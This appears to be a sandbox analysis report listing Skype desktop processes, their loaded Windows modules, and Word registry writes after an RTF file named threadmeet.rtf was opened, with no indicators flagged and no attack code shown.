"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --ms-disable-indexeddb-transaction-timeout --no-sandbox --service-pipe-token=2081F93785EFD741EEB54B3B95AFD6A3 --lang=en-US --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files\Microsoft\Skype for Desktop\resources\app.asar" --node-integration=false --webview-tag=true --no-sandbox --preload="C:\Program Files\Microsoft\Skype for Desktop\resources\app.asar\Preload.js" --context-id=2 --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553 --disable-accelerated-video-decode --disable-gpu-compositing --enable-gpu-async-worker-context --service-request-channel-token=2081F93785EFD741EEB54B3B95AFD6A3 --renderer-client-id=3 --mojo-platform-channel-handle=1540 /prefetch:1
Path
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Indicators
No indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Skype Technologies S.A.
Description
Skype
Version
8.29.0.50
Modules
Image
c:\program files\microsoft\skype for desktop\skype.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\node.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\program files\microsoft\skype for desktop\msvcp140.dll
c:\program files\microsoft\skype for desktop\vcruntime140.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\microsoft\skype for desktop\ucrtbase.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-localization-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l2-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-synch-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-string-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-math-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-time-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-utility-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-conio-l1-1-0.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\version.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\apphelp.dll
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\release\spellchecker.node
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\release\keyboard-layout-manager.node
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\slimcore.node
c:\windows\system32\pdh.dll
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
c:\windows\system32\avrt.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\npmproxy.dll

PID
2508
CMD
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Skype /v RestartForUpdate
Path
C:\Windows\system32\reg.exe
Indicators
No indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Registry Console Tool
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2132
CMD
"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --reporter-url=https://rink.hockeyapp.net/api/2/apps/a741743329d94bc08826af367733939d/crashes/upload --application-name=skype-preview "--crashes-directory=C:\Users\admin\AppData\Local\Temp\skype-preview Crashes" --v=1
Path
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Skype Technologies S.A.
Description
Skype
Version
8.29.0.50
Modules
Image
c:\program files\microsoft\skype for desktop\skype.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\node.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\program files\microsoft\skype for desktop\msvcp140.dll
c:\program files\microsoft\skype for desktop\vcruntime140.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\microsoft\skype for desktop\ucrtbase.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-localization-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l2-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-synch-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-string-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-math-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-time-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-utility-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-conio-l1-1-0.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\version.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll

PID
2116
CMD
"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --ms-disable-indexeddb-transaction-timeout --no-sandbox --service-pipe-token=C104863F243C359C00B6F8EB6F586BD3 --lang=en-US --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files\Microsoft\Skype for Desktop\resources\app.asar" --node-integration=false --webview-tag=true --no-sandbox --preload="C:\Program Files\Microsoft\Skype for Desktop\resources\app.asar\Preload.js" --context-id=1 --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553 --disable-accelerated-video-decode --disable-gpu-compositing --enable-gpu-async-worker-context --service-request-channel-token=C104863F243C359C00B6F8EB6F586BD3 --renderer-client-id=4 --mojo-platform-channel-handle=2648 /prefetch:1
Path
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Indicators
No indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Skype Technologies S.A.
Description
Skype
Version
8.29.0.50
Modules
Image
c:\program files\microsoft\skype for desktop\skype.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\node.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\program files\microsoft\skype for desktop\msvcp140.dll
c:\program files\microsoft\skype for desktop\vcruntime140.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\microsoft\skype for desktop\ucrtbase.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-localization-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l2-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-synch-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-string-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-math-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-time-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-utility-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-conio-l1-1-0.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\version.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\apphelp.dll
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\release\spellchecker.node
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\release\keyboard-layout-manager.node
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\slimcore.node
c:\windows\system32\pdh.dll
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
c:\windows\system32\avrt.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\npmproxy.dll

PID
2788
CMD
"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --reporter-url=https://rink.hockeyapp.net/api/2/apps/a741743329d94bc08826af367733939d/crashes/upload --application-name=skype-preview "--crashes-directory=C:\Users\admin\AppData\Local\Temp\skype-preview Crashes" --v=1
Path
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Skype Technologies S.A.
Description
Skype
Version
8.29.0.50
Modules
Image
c:\program files\microsoft\skype for desktop\skype.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\node.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\program files\microsoft\skype for desktop\msvcp140.dll
c:\program files\microsoft\skype for desktop\vcruntime140.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\microsoft\skype for desktop\ucrtbase.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-localization-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l2-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-synch-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-string-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-math-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-time-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-utility-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-conio-l1-1-0.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\version.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll

Registry activity

Total events
858
Read events
795
Write events
59
Delete events
4

Modification events

PID
Process
Operation
Key
Name
Value
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
u8>
75383E008C0A0000010000000000000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1321992223
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992336
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992337
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
8C0A000032062695AB20D50100000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
i:>
693A3E008C0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
|<>
7C3C3E008C0A000006000000010000005C000000020000004C0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C007400680072006500610064006D006500650074002E00720074006600000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{B3F8BBC7-139E-4A27-BDED-77B9F2C57C6A}
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D520AB96A10890][O00000000]*C:\Users\admin\Desktop\
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D520AB96A10890][O00000000]*C:\Users\admin\Desktop\threadmeet.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\127E03
127E03
040000008C0A00002500000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C007400680072006500610064006D006500650074002E007200740066000E0000007400680072006500610064006D006500650074002E0072007400660000000000010000000000000080C5E6E2D2E9D401037E1200037E120000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2700
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2700
WINWORD.EXE
write
